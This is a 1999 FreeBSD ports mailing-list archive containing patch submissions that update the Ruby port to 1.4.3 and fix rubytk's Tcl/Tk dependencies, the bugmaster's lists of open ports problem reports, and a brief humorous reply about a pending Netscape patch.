smtp.teleway.ne.jp (smtp.teleway.ne.jp [203.140.129.13]) by hub.freebsd.org (Postfix) with ESMTP id 9C51F150E4 for ; Mon, 20 Dec 1999 10:43:34 -0800 (PST) (envelope-from yasuf@big.or.jp) Received: from localhost (kokura1-14.teleway.ne.jp [210.234.51.14]) by smtp.teleway.ne.jp (8.9.3+3.2W/3.7W) with ESMTP id DAA07777 for ; Tue, 21 Dec 1999 03:43:31 +0900 (JST) (envelope-from yasuf@big.or.jp) Message-Id: <19991221034327H.yasuf@big.or.jp> Date: Tue, 21 Dec 1999 03:43:27 +0900 From: yasuf@big.or.jp Reply-To: yasuf@big.or.jp To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15590: Update: lang/ruby Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15590 >Category: ports >Synopsis: Update: lang/ruby >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 10:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Yasuhiro Fukuma >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: >Description: This patch contains: - Updates for ruby-1.4.3. >How-To-Repeat: >Fix: Index: ruby/Makefile =================================================================== RCS file: /home/ncvs/ports/lang/ruby/Makefile,v retrieving revision 1.14 diff -u -r1.14 Makefile --- Makefile 1999/11/14 01:37:13 1.14 +++ Makefile 1999/12/16 07:09:02 @@ -1,12 +1,12 @@ # New ports collection makefile for: ruby -# Version required: 1.4.2 +# Version required: 1.4.3 # Date created: 04 September 1997 # Whom: Eiji-usagi-MATSUmoto # # $FreeBSD: ports/lang/ruby/Makefile,v 1.14 1999/11/14 01:37:13 steve Exp $ # -DISTNAME= ruby-1.4.2 +DISTNAME= ruby-1.4.3 CATEGORIES= lang MASTER_SITES= ftp://ftp.netlab.co.jp/pub/lang/ruby/${BRANCH_NAME}/ \ ftp://ftp.TokyoNet.AD.JP/pub/misc/ruby/${BRANCH_NAME}/ \ Index: ruby/files/md5 =================================================================== RCS file: /home/ncvs/ports/lang/ruby/files/md5,v retrieving revision 1.8 diff -u -r1.8 md5 --- md5 1999/11/14 01:37:19 1.8 +++ md5 1999/12/09 22:50:51 @@ -1 +1 @@ -MD5 (ruby-1.4.2.tar.gz) = 13c18f8cfa0cb0bf1268942cfc04c462 +MD5 (ruby-1.4.3.tar.gz) = ff2df3fa6855e087998bf5d1fb6dfbd9 Index: ruby/pkg/PLIST =================================================================== RCS file: /home/ncvs/ports/lang/ruby/pkg/PLIST,v retrieving revision 1.9 diff -u -r1.9 PLIST --- PLIST 1999/11/14 01:37:22 1.9 +++ PLIST 1999/12/09 23:05:24 @@ -29,7 +29,6 @@ lib/ruby/%%RUBY_VER%%/%%RUBY_ARCH%%/st.h lib/ruby/%%RUBY_VER%%/%%RUBY_ARCH%%/util.h lib/ruby/%%RUBY_VER%%/%%RUBY_ARCH%%/version.h -lib/ruby/%%RUBY_VER%%/%%RUBY_ARCH%%/y.tab.h lib/ruby/%%RUBY_VER%%/English.rb lib/ruby/%%RUBY_VER%%/Env.rb lib/ruby/%%RUBY_VER%%/base64.rb @@ -79,6 +78,7 @@ lib/ruby/%%RUBY_VER%%/timeout.rb lib/ruby/%%RUBY_VER%%/tracer.rb lib/ruby/%%RUBY_VER%%/weakref.rb +lib/ruby/%%RUBY_VER%%/cgi/session.rb lib/ruby/%%RUBY_VER%%/net/pop.rb lib/ruby/%%RUBY_VER%%/net/session.rb lib/ruby/%%RUBY_VER%%/net/smtp.rb @@ -86,6 +86,7 @@ @dirrm lib/ruby/%%RUBY_VER%%/site_ruby/%%RUBY_ARCH%% @dirrm lib/ruby/%%RUBY_VER%%/site_ruby @dirrm lib/ruby/%%RUBY_VER%%/%%RUBY_ARCH%% +@dirrm lib/ruby/%%RUBY_VER%%/cgi @dirrm lib/ruby/%%RUBY_VER%%/net @dirrm lib/ruby/%%RUBY_VER%% @dirrm lib/ruby @@ -147,7 +148,6 @@ share/examples/ruby/rcs.awk share/examples/ruby/rcs.dat share/examples/ruby/rcs.rb -share/examples/ruby/rd2html.rb share/examples/ruby/regx.rb share/examples/ruby/rename.rb share/examples/ruby/sieve.rb >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 10:50:15 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 896A81537A for ; Mon, 20 Dec 1999 10:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA45925; Mon, 20 Dec 1999 10:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from smtp2.teleway.ne.jp (smtp2.teleway.ne.jp [203.140.129.37]) by hub.freebsd.org (Postfix) with ESMTP id 5B8251503D for ; Mon, 20 Dec 1999 10:44:18 -0800 (PST) (envelope-from yasuf@big.or.jp) Received: from localhost (kokura1-14.teleway.ne.jp [210.234.51.14]) by smtp2.teleway.ne.jp (8.9.3+3.2W/3.7W) with ESMTP id DAA14375 for ; Tue, 21 Dec 1999 03:44:16 +0900 (JST) (envelope-from yasuf@big.or.jp) Message-Id: <19991221034416M.yasuf@big.or.jp> Date: Tue, 21 Dec 1999 03:44:16 +0900 From: yasuf@big.or.jp Reply-To: yasuf@big.or.jp To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15592: Update: japanese/rubytk Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15592 >Category: ports >Synopsis: Update: japanese/rubytk >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 10:50:03 PST 1999 >Closed-Date: >Last-Modified: >Originator: Yasuhiro Fukuma >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: >Description: This patch contains: - Fix of dependence on wrong japanese/{tcl,tk}82 ports. >How-To-Repeat: >Fix: Index: rubytk/Makefile =================================================================== RCS file: /home/ncvs/ports/japanese/rubytk/Makefile,v retrieving revision 1.4 diff -u -r1.4 Makefile --- Makefile 1999/11/29 03:59:38 1.4 +++ Makefile 1999/12/11 03:00:42 @@ -11,6 +11,8 @@ MAINTAINER= yasuf@big.or.jp +TCL_VERSION?= 80 +TK_VERSION?= 80 WITH_TCL_JP= yes MASTERDIR= ${.CURDIR}/../../x11-toolkits/rubytk >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 11: 0:33 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BAD4F1539B for ; Mon, 20 Dec 1999 11:00:11 -0800 (PST) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA46695 for freebsd-ports@freebsd.org; Mon, 20 Dec 1999 11:00:10 -0800 (PST) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 20 Dec 1999 11:00:10 -0800 (PST) Message-Id: <199912201900.LAA46695@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD ports list Subject: Current unassigned ports problem reports Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Current FreeBSD problem reports The following is a listing of current problems submitted by FreeBSD users. These represent problem reports covering all versions including experimental development code and obsolete releases. Bugs can be in one of several states: o - open A problem report has been submitted, no sanity checking performed. a - analyzed The report has been examined by a team member and evaluated. f - feedback The problem has been solved, and the originator has been given a patch or a fix has been committed. The PR remains in this state pending a response from the originator. s - suspended The problem is not being worked on. This is a prime candidate for somebody who is looking for a project to do. If the problem cannot be solved at all, it will be closed, rather than suspended. c - closed A problem report is closed when any changes have been integrated, documented, and tested. Critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1999/11/30] ports/15181 ports New port: comms/plp o [1999/12/09] ports/15393 ports [fix] japanese/expect o [1999/12/14] ports/15484 ports 'make test' crashes in math/netcdf o [1999/12/19] ports/15577 ports Amanda 2.3.0 runtar program allow any use o [1999/12/19] ports/15578 ports Amanda 2.3.0 runtar program allow any use 5 problems total. Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1999/07/14] ports/12637 ports patch to help multi-byte support in windo o [1999/08/15] ports/13170 ports New port: UW-Imap with maildir and qmail o [1999/11/03] ports/14696 ports New port: wmGrabImage o [1999/11/14] ports/14888 ports ports/security/bjorb build fails o [1999/11/16] ports/14926 ports JBIG-KIT port upgraded to the version 1.1 o [1999/11/17] ports/14944 ports No stable Gimp in ports o [1999/11/18] ports/14987 ports graphics/xpm does not build a dynamic lib o [1999/11/22] ports/15050 ports Re: Tcl Data transformations (Tcl-Trf) po o [1999/11/22] ports/15060 ports Update port: misc/fortuneit o [1999/11/26] ports/15100 ports new port links-0.80 o [1999/11/27] ports/15120 ports [PATCH] mail/pine4 pgp support does not h o [1999/11/28] ports/15137 ports [PATCH] www/lynx-ssl can't find OpenSSL i o [1999/12/01] ports/15212 ports new port: irc/bitchx-1.0 o [1999/12/06] ports/15305 ports can't install netpbm-8.0 o [1999/12/07] ports/15332 ports port of ftplocate-1.50 o [1999/12/07] ports/15348 ports [update] japanese/tcl80 o [1999/12/07] ports/15349 ports [update] japanese/tk80 o [1999/12/10] ports/15395 ports fix port: net/mrtg (BUILD/LIB_DEPEND prob o [1999/12/10] ports/15404 ports www/p5-CGI: Wrong BUILD_DEPENDS? o [1999/12/11] ports/15426 ports build of devel/t1lib hangs in configure o [1999/12/12] ports/15437 ports update graphics/gd port to support ttf an o [1999/12/12] ports/15438 ports p5-GD port update (1.18 -> 1.23) o [1999/12/12] ports/15442 ports upgrade of nethack port to 3.2.3, which h o [1999/12/16] ports/15518 ports Patch to make xsoldier setgid games inste o [1999/12/16] ports/15523 ports Motif/Lesstif not found when grace-5.0.3g o [1999/12/16] ports/15524 ports ports audio dap-2.0.2 MD5 probrem o [1999/12/17] ports/15540 ports Update mod_dav to version 0.9.14 o [1999/12/17] ports/15541 ports KDE screen saver with password protection o [1999/12/17] ports/15543 ports Samba + DHCP = UNKNOWN HOST NAME 29 problems total. Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1998/03/30] ports/6181 ports New port: xoj-1.0 o [1998/08/03] ports/7485 ports New port: Xterminal-0.2 o [1998/09/19] ports/7992 ports New port: xemacs20-stepwise (XEmacs20 hac a [1998/11/25] ports/8864 ports useradd - system V compatible implementat o [1999/02/07] ports/9954 ports New port: devel/ACE o [1999/02/10] ports/10007 ports Port of the mercury compiler version 0.8 o [1999/02/16] ports/10124 ports UNIX|STAT pr submission failed to include o [1999/03/07] ports/10477 ports The fakemail in lib-src fails to link (ne o [1999/03/10] ports/10532 ports New port: lang/gpc - GNU Pascal o [1999/03/16] ports/10634 ports Update the hylafax port to do a client in o [1999/03/26] ports/10813 ports crossgo32 brokeness f [1999/03/28] ports/10844 ports New port: adagdb o [1999/04/02] ports/10916 ports New port: biology/molmol o [1999/04/08] ports/11029 ports Configure scripts for non ported applicat o [1999/04/08] ports/11034 ports New port: www/crazywwwboardle o [1999/05/11] ports/11652 ports New port: net/dictd o [1999/05/24] ports/11879 ports dclock's "-miltime" option and "*miltime" o [1999/05/31] ports/11963 ports should update the ocaml-tk module and ins o [1999/06/02] ports/12001 ports wmcdplay 1.0Beta1 05/09/1998 sometimes sk o [1999/06/03] ports/12013 ports patch for 12012 o [1999/06/13] ports/12188 ports New port: pbs-2.1.11 (misc/PBS) a batch s o [1999/06/13] ports/12195 ports New port: pgpenvelope o [1999/06/14] ports/12204 ports Update port: graphics/EZWGL o [1999/06/18] ports/12271 ports fix pkg_add with error message and add ne o [1999/06/23] ports/12368 ports Pilot-link installs to ${PREFIX} = ${LOCA o [1999/06/26] ports/12403 ports ssh port has undocumented X11 dependency f [1999/06/26] ports/12406 ports New port for the LAM implementation of th o [1999/07/02] ports/12490 ports package xmine exits 1 with XawAsciiSource o [1999/07/02] ports/12492 ports port misc/diction should be moved to text o [1999/07/03] ports/12503 ports New port: Willows toolkit (developers rel o [1999/07/05] ports/12518 ports New port: ifmail-os-2.14.7 o [1999/07/05] ports/12522 ports New port: cos o [1999/07/05] ports/12523 ports New port: jdbcpool o [1999/07/06] ports/12536 ports New port: lang/cu-prolog o [1999/07/07] ports/12549 ports imap-uw port doesn't use pw_expire to che o [1999/07/09] ports/12571 ports Xfig port doesn't have Ghostscript suppor o [1999/07/13] ports/12624 ports New version of mxv which also works with o [1999/07/15] ports/12656 ports New port: gnujsp o [1999/07/18] ports/12699 ports New port: gnofin-0.5.10 o [1999/07/20] ports/12722 ports New port: AT&T's DjVu library for scanned o [1999/07/21] ports/12739 ports New port: AT&T's DjVu Netscape plug-in o [1999/07/27] ports/12835 ports New port: libcgic-1.06 o [1999/07/31] ports/12899 ports New port: wmnet-new o [1999/07/31] ports/12903 ports new ports/database/p5-* o [1999/08/01] ports/12915 ports Add elm 2.5 to ports o [1999/08/13] ports/13124 ports New port: LinAlg; request for local hosti o [1999/08/16] ports/13173 ports New port: yiff-0.33 o [1999/08/17] ports/13191 ports New port: fire-1.0 o [1999/08/17] ports/13201 ports New port: xmess (X11 emulator for game co o [1999/08/18] ports/13251 ports New port: founts-11 o [1999/08/20] ports/13267 ports New port: glasteroids-1.0 o [1999/08/21] ports/13291 ports New port: xap-xwf-0.7.8 o [1999/08/31] ports/13514 ports another TCL interface to MySQL port o [1999/09/02] ports/13541 ports New port: chpp-0.3.5 o [1999/09/05] ports/13583 ports New port: databases/py-MySQL o [1999/09/07] ports/13614 ports xdm and wdm do not set environment variab o [1999/09/07] ports/13633 ports Better location for samba's private direc o [1999/09/09] ports/13677 ports Misc. Ports fix ups. o [1999/09/18] ports/13808 ports linux-rvplayer port improved a'la netscap o [1999/09/26] ports/13986 ports New port: sysutils/gnometoaster o [1999/09/30] ports/14052 ports fvwm95-i18n - missing dependence to fbsd- o [1999/09/30] ports/14070 ports g2c libraries and compatibility for DJGPP o [1999/10/01] ports/14077 ports Multicast not available on multicast enab o [1999/10/01] ports/14079 ports ssh2 port won't install if automake is in o [1999/10/02] ports/14088 ports port of new fvwm 2.3 beta (2.3.8) o [1999/10/07] ports/14185 ports ports/x11-wm/fvwm2 updated from 2.2.2 to o [1999/10/08] ports/14209 ports Update port: graphics/giflib to libungif- o [1999/10/11] ports/14260 ports New port: WODA - A Web Oriented Database o [1999/10/14] ports/14337 ports xdm and Eterm: tty allocation problem? o [1999/10/17] ports/14378 ports New port: graphics/mpeg o [1999/10/17] ports/14379 ports New port: graphics/xmrm o [1999/10/17] ports/14381 ports New port: games/x3eyes o [1999/10/23] ports/14469 ports remove port: deskutils/recycler o [1999/10/23] ports/14471 ports remove port: deskutils/xcalendar o [1999/10/23] ports/14478 ports status on port devel/gaa - feedback pleas o [1999/10/25] ports/14515 ports New Tripwire 1.3 Port o [1999/10/27] ports/14554 ports new port: qrash o [1999/10/30] ports/14618 ports New port: security/librc4 o [1999/10/30] ports/14619 ports New port: security/libsasl o [1999/10/31] ports/14633 ports vflib upgrade: 2.24.1->2.24.2 o [1999/11/01] ports/14643 ports A Chinese/English dictionary o [1999/11/01] ports/14644 ports A Big5-localized & XIM-enabled XEmacs por o [1999/11/02] ports/14663 ports aspell-.27.2 port doesn't read dictionari o [1999/11/03] ports/14686 ports New port: pisces IIB (Category: cad) o [1999/11/03] ports/14701 ports New Port o [1999/11/04] ports/14705 ports [NEW PORTS] ports of xls2xml converter an o [1999/11/04] ports/14716 ports This is a port of a Swedish dictionary to o [1999/11/06] ports/14741 ports A summary of the old ispell-language-file o [1999/11/06] ports/14743 ports tcl/e package install hangs sysinstall wi o [1999/11/06] ports/14744 ports tksetathome hangs sysinstall due to lack o [1999/11/06] ports/14745 ports local package fails to install o [1999/11/07] ports/14759 ports Many minor port clean-ups o [1999/11/07] ports/14761 ports More minor port clean-ups o [1999/11/07] ports/14771 ports sslwrap - a new port o [1999/11/08] ports/14783 ports mgetty 1.1.12 always sets clocal o [1999/11/12] ports/14855 ports [NEW PORT] hns (Hyper NIKKI System) f [1999/11/13] ports/14859 ports OpenSSH has no support for the login clas o [1999/11/13] ports/14866 ports Upgrade FP Exts to FrontPage 2000 Exts. o [1999/11/14] ports/14869 ports New FreeBSD port for jesred-1.2.pl1 o [1999/11/14] ports/14870 ports port submission: lc-1.0 o [1999/11/14] ports/14874 ports Eterm 0.8.10 was released o [1999/11/14] ports/14879 ports New port: lang/starlogo o [1999/11/14] ports/14889 ports [PATCH] dynamic loading for WINE port o [1999/11/14] ports/14894 ports comm/kermit some fixed patch o [1999/11/15] ports/14915 ports Update port: net/generic-nqs o [1999/11/16] ports/14922 ports Want to contribute new package/port o [1999/11/17] ports/14945 ports [NEW PORT] gtkdiff - the diff(1) front-en o [1999/11/17] ports/14956 ports new port: www/screem o [1999/11/17] ports/14957 ports gtk12 requires Cronyx fonts for Russian l o [1999/11/17] ports/14963 ports update for current sox port to include GS o [1999/11/17] ports/14971 ports mkcmd-8.10 port submission o [1999/11/17] ports/14972 ports msrc0-0.6 port submission o [1999/11/18] ports/14986 ports possible bug in ssh1 o [1999/11/18] ports/14991 ports Tcl Data transformations (Tcl-Trf) port o [1999/11/19] ports/14994 ports [ports upgrade] chinese/pine4 from 4.20 t o [1999/11/21] ports/15016 ports New Port: lang/yabasic o [1999/11/21] ports/15021 ports some port installs fail for non-root user o [1999/11/21] ports/15024 ports new port: sysutils/detach o [1999/11/21] ports/15027 ports libmcrypt's distfiles should be updated o [1999/11/21] ports/15030 ports New patch, i3dren o [1999/11/21] ports/15031 ports new port editors/auctex o [1999/11/23] ports/15064 ports New port submittal o [1999/11/25] ports/15093 ports ass man pages to net/dnsutl o [1999/11/27] ports/15130 ports update port: www/hypermail o [1999/11/28] ports/15131 ports new port: devel/kpp o [1999/11/28] ports/15134 ports new port: www/kdreamsite o [1999/11/28] ports/15135 ports new port: devel/cervisia o [1999/11/28] ports/15141 ports update games/gracer to 0.1.4 o [1999/11/28] ports/15143 ports update to freetds port (new release) o [1999/11/28] ports/15144 ports New port for hevea o [1999/11/28] ports/15146 ports New port submition emulator/truereality, o [1999/11/28] ports/15147 ports New port: audio/xsidplay o [1999/11/28] ports/15148 ports Update port: graphics/gimp1-i18n o [1999/11/28] ports/15152 ports new port cd-console o [1999/11/28] ports/15154 ports update the p5-SQL-Statement port to versi o [1999/11/28] ports/15159 ports new port: games/blackpenguin o [1999/11/28] ports/15160 ports new port: games/ksnes9x o [1999/11/29] ports/15166 ports update udmsearch port to 2.2.1 o [1999/11/29] ports/15170 ports Update Port: leafnode+ o [1999/11/29] ports/15173 ports Update Etherboot 4.2.11 o [1999/11/30] ports/15180 ports New audio port submission: soundtracker o [1999/11/30] ports/15188 ports [PATCH] ports/mail/p5-IMAP-Admin upgrade o [1999/11/30] ports/15192 ports Ident2 Daemon o [1999/12/01] ports/15203 ports New FreeBSD port: p5-Term-ANSIColor o [1999/12/02] ports/15223 ports Update port: audio/mpeg-lib o [1999/12/02] ports/15226 ports Update port: misc/amanda o [1999/12/03] ports/15237 ports update: ports/misc/fd (followup source di o [1999/12/03] ports/15242 ports Update port: japanese/grep o [1999/12/03] ports/15244 ports Update port: japanese/gxditview o [1999/12/03] ports/15246 ports New port: irc/gtk-bitchx o [1999/12/03] ports/15250 ports MC fail to show contents of ZIP archives o [1999/12/04] ports/15252 ports small fix to remove setuid proposal + mas o [1999/12/04] ports/15253 ports update nqc port to 2.0.2 o [1999/12/04] ports/15258 ports New port: misc/party o [1999/12/04] ports/15260 ports New port: games/cursive o [1999/12/04] ports/15263 ports [PATCH] Updates for devel/freelibiberty o [1999/12/04] ports/15264 ports New port: sysutils/orville-write o [1999/12/04] ports/15266 ports UPDATE: ports/www/tidy to Nov 30 version o [1999/12/05] ports/15282 ports unfetchable MASTER_SITES change: archiver o [1999/12/05] ports/15295 ports Update port: rrdtool from version 1.0.7 t o [1999/12/06] ports/15307 ports Port for pstotext o [1999/12/06] ports/15313 ports Persuade graphics/gd to build shared libr o [1999/12/06] ports/15315 ports Xfstt may thrash the drive. o [1999/12/06] ports/15316 ports Can not install ssh2 o [1999/12/06] ports/15319 ports Mailcrypt upgrade from 3.4 to 3.5.5 o [1999/12/06] ports/15324 ports Update port: graphics/enfle o [1999/12/07] ports/15330 ports editor joe modification o [1999/12/07] ports/15334 ports Update port: audio/gsm o [1999/12/07] ports/15335 ports Update port: graphics/dore o [1999/12/07] ports/15336 ports Update port: graphics/epstool o [1999/12/07] ports/15341 ports XF86Setup in CURRENT is broken on possibl o [1999/12/07] ports/15343 ports Port update: net/icqlib o [1999/12/07] ports/15344 ports Port update: net/kicq o [1999/12/07] ports/15347 ports [New Ports] Xatm o [1999/12/08] ports/15355 ports [PATCH] New version 2.4 of WmakerConf (x1 o [1999/12/08] ports/15359 ports Update port: russian/apache13 o [1999/12/08] ports/15360 ports new port = logcheck o [1999/12/08] ports/15366 ports Update: japanese/libslang o [1999/12/08] ports/15367 ports new ports on linux emulator o [1999/12/09] ports/15372 ports ja-platex2e ports are too obsolete o [1999/12/09] ports/15378 ports Update port: audio/maplay o [1999/12/10] ports/15394 ports new port: japanese/kanji18, kanji26, ngra o [1999/12/10] ports/15397 ports port lang/elk: CC not settable. o [1999/12/10] ports/15401 ports Update ports: XEmacs-21.1.8 o [1999/12/10] ports/15402 ports Update port: games/xshisen o [1999/12/10] ports/15407 ports New Port: graphics/chbg o [1999/12/10] ports/15409 ports [PATCH] net/tik shell script to launch `` o [1999/12/11] ports/15415 ports port games/xqf: update to 0.9.1 o [1999/12/11] ports/15423 ports update mail/nmh port to nmh-1.0.2 o [1999/12/11] ports/15424 ports new port: www/kwebsearch o [1999/12/11] ports/15428 ports update port: astro/xearth 1.0 -> 1.1 o [1999/12/11] ports/15431 ports New port: games/baduki o [1999/12/11] ports/15432 ports fix devel/t1lib packaging error o [1999/12/11] ports/15433 ports Small update to flexbackup port. Maintain o [1999/12/12] ports/15434 ports new port: devel/kdevelop o [1999/12/12] ports/15443 ports Updated port: devel/t1lib from 0.9.2 to 1 o [1999/12/12] ports/15444 ports Updated port: graphics/xpdf due to pendin o [1999/12/12] ports/15453 ports Update FreeTDS from 0.47pre2 to 0.50 o [1999/12/13] ports/15459 ports news/cnews for for gawk o [1999/12/13] ports/15462 ports New port: cad/cider o [1999/12/13] ports/15465 ports Update port: cad/xcircuit to 2.0b1 o [1999/12/13] ports/15466 ports Update port: devel/gide to 0.1.6 o [1999/12/13] ports/15467 ports Update port: graphics/tiff o [1999/12/13] ports/15468 ports Update port: math/blas o [1999/12/13] ports/15469 ports New port: nethack-3.3.0 o [1999/12/13] ports/15473 ports port lang/squeak2: CC not settable. o [1999/12/14] ports/15477 ports wwwstat-2.01 port is not Y2K compliant: 1 o [1999/12/14] ports/15479 ports Ports update of syncal to version 0.8.3 o [1999/12/14] ports/15481 ports ports/devel/codecrusader slightly broken o [1999/12/15] ports/15498 ports Update port: archivers/lzo o [1999/12/15] ports/15499 ports Update port: math/eispack o [1999/12/15] ports/15500 ports Update port: math/linpack o [1999/12/15] ports/15501 ports Update port: math/superlu to 2.0 o [1999/12/15] ports/15502 ports Update port: math/umfpack to 2.2.1 o [1999/12/15] ports/15503 ports GNOME updates o [1999/12/15] ports/15504 ports Update textproc/aspell o [1999/12/15] ports/15506 ports Update x11-toolkits/gtk-engines o [1999/12/15] ports/15507 ports new port: devel/robodoc o [1999/12/15] ports/15509 ports New port: p5-Chart-PNGgraph o [1999/12/16] ports/15514 ports /usr/ports/devel/t1lib hangs in configure o [1999/12/16] ports/15517 ports Port of newly released game nethack 3.3.0 o [1999/12/16] ports/15522 ports Wrong Maintainer E-Mail in hp2xx and tclo o [1999/12/16] ports/15525 ports macro AM_GNU_GETTEXT will not make use of o [1999/12/16] ports/15526 ports [NEW PORT] security/pgpgpg: a wrapper for o [1999/12/17] ports/15527 ports www/mathopd upgrade: 1.3 => 1.3pl2 o [1999/12/17] ports/15533 ports Update port: devel/asl to 1.41r8 o [1999/12/17] ports/15534 ports Update port: devel/dmake o [1999/12/17] ports/15535 ports Update port: devel/flick to 2.1 o [1999/12/17] ports/15536 ports Update port: devel/picprog o [1999/12/17] ports/15537 ports Update port: x11/sxpc o [1999/12/17] ports/15538 ports Update port: x11/wmmatrix o [1999/12/17] ports/15539 ports Update port: x11/xbanner o [1999/12/17] ports/15545 ports new port: x11/xterm o [1999/12/18] ports/15552 ports new port (knode) o [1999/12/18] ports/15556 ports Additional patches for www/w3m o [1999/12/19] ports/15558 ports /usr/ports/x11/gnomelibs fails to compile o [1999/12/19] ports/15559 ports update astro/soaimage to 1.26 o [1999/12/19] ports/15560 ports update port to 0.2 o [1999/12/19] ports/15562 ports update of ports/textproc/X2html to versio o [1999/12/19] ports/15563 ports Updating the lang/librep port o [1999/12/19] ports/15564 ports update port to 2.4 o [1999/12/19] misc/15565 ports x11-toolkits/rep-gtk updated o [1999/12/19] ports/15566 ports x11-wm/sawmill update o [1999/12/19] ports/15567 ports update games/bs to 2.2 (from 2.1) o [1999/12/19] ports/15568 ports Please update sysutils/ascpu to 1.8 o [1999/12/19] ports/15569 ports Small fix for net/xferstats o [1999/12/19] ports/15570 ports Please update net/p5-Net-RawIP o [1999/12/19] ports/15572 ports Update benchmars/polygraph to the current o [1999/12/19] ports/15573 ports Fix for devel/gaa distfiles o [1999/12/19] ports/15574 ports Fix for net/ggsd mastersites o [1999/12/19] ports/15575 ports Bugfix of port: net/dante o [1999/12/19] ports/15576 ports Update www/amaya to 2.4 o [1999/12/20] ports/15583 ports Update port: lang/cim to 3.33 o [1999/12/20] ports/15584 ports Update port: lang/forth o [1999/12/20] ports/15585 ports Update port: x11-clocks/bclock o [1999/12/20] ports/15586 ports Update port: x11-clocks/dclock to pl6 o [1999/12/20] ports/15587 ports Update port: x11-clocks/t3d o [1999/12/20] ports/15588 ports Update port: x11/sxpc o [1999/12/20] ports/15589 ports update games/netris to 0.5 o [1999/12/20] ports/15590 ports Update: lang/ruby o [1999/12/20] ports/15591 ports Update: x11-toolkits/rubytk o [1999/12/20] ports/15592 ports Update: japanese/rubytk 262 problems total. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 11: 1:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 51D3D154C1 for ; Mon, 20 Dec 1999 11:01:09 -0800 (PST) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA47145 for ports@freebsd.org; Mon, 20 Dec 1999 11:01:09 -0800 (PST) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 20 Dec 1999 11:01:09 -0800 (PST) Message-Id: <199912201901.LAA47145@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: ports@FreeBSD.org Subject: Current problem reports assigned to you Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Current FreeBSD problem reports Critical problems Serious problems Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1999/07/16] ports/12666 ports New port: kcd-4.7.10 1 problem total. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 11: 6:17 1999 Delivered-To: freebsd-ports@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 356AD1537F for ; Mon, 20 Dec 1999 11:06:15 -0800 (PST) (envelope-from billf@chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 8B7C81C2B; Mon, 20 Dec 1999 14:05:45 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 87C26381B; Mon, 20 Dec 1999 14:05:45 -0500 (EST) Date: Mon, 20 Dec 1999 14:05:45 -0500 (EST) From: Bill Fumerola To: Alexander Langer Cc: Palle Girgensohn , ports@FreeBSD.ORG Subject: Re: linux-netscape In-Reply-To: <19991220173950.A2733@cichlids.cichlids.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 20 Dec 1999, Alexander Langer wrote: > > > The patch is in PR-15287 since Dec 5. How can I receive my cookies? :-) > > You'll recieve your cookies in the form of a commit mail once the > > ports freeze thaws. > > write(Palle, (cookie) cvs commit, 1); ? > > That's a cheat, Bill! Never trust a committer, we only want you for your patches. ;-> -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body 